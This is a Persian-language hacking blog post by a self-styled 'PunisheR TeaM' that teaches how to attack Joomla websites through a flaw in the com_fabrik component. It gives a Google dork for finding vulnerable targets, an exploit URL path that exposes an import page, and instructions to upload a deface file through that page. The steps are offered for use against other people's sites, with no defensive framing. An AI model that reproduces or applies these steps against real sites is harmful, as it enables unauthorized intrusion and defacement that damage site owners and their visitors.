PunisheR TeaM

زانو نخواهم زد حتی اگر سقف اسمان از قامتم کوتاه تر شود
PunisheR TeaM

این سایت تابع قوانین جمهوری اسلامی ایران می باشد
مطالب در صورت در خواست گارگروه تعیین مصادق مجرمانه اینترنتی حذف خواهد شد

دنبال کنندگان ۱ نفر
این وبلاگ را دنبال کنید
نویسندگان

هک سایت از طریق باگ Component joomla

سلام دوستان من دوباره اومدم با یک اموزش جدید .خوب اموزش این بخش درمورد هک سایت از طریق باگ
Component joomla

هستش . خب برای شروع و پیدا کردن سایت هدف target دورک زیر رو در گوگل سرچ میکنیم
Inurl:index.php? Option=com-fabrik
بعد از پیدا کردن سایت هدف باید exploit رو وارد کنیم برای همین کد زیر رو طزریق میکنیم ..
Index.php? Option=com - fabrik&c=import&view=import&filetype=csv&table=1
خب البته اینو باید جلوی ادرس سایت وارد کنید . خب بعد اگه سایت باگ رو داشته باشه یه صفحه ای میاد با نام
Import csv file
خب بعد جلوش گزینه choose file رو بزنید و دیفیس خودتونو که ساختید انتخاب کنید و اپلودش کنید

  • hacker punisher

نظرات  (۱)

  • محمد مهدی رمضانی
  • با سلام من یه وبلاگ جدید ساختم و میخواهم شما رو هم به وبلاگ خودم دعوت کنم اگر موافقید با من تبادل لینک کنید
    پاسخ:
    سلام
    شرمنده داش تبادل لینک نداریم فعلا
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی